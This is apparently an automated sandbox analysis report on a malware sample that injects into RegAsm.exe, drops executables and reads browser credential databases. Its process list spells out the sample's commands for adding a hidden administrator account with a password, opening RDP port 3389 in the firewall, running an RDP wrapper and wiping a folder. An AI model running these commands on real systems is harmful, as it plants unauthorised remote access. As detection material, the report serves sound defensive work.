Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: GDAAKK.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\IDBAFHDGDG.exe "C:\ProgramData\IDBAFHDGDG.exe"
Source: C:\ProgramData\IDBAFHDGDG.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\IDBAFHDGDG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIIIIJDHJE.exe "C:\ProgramData\GIIIIJDHJE.exe"
Source: C:\ProgramData\GIIIIJDHJE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GIIIIJDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\AFHDGDGIID.exe "C:\ProgramData\AFHDGDGIID.exe"
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_fec8106a DlRcmVQWc0I6 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\IDBAFHDGDG.exe "C:\ProgramData\IDBAFHDGDG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIIIIJDHJE.exe "C:\ProgramData\GIIIIJDHJE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\AFHDGDGIID.exe "C:\ProgramData\AFHDGDGIID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_fec8106a DlRcmVQWc0I6 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
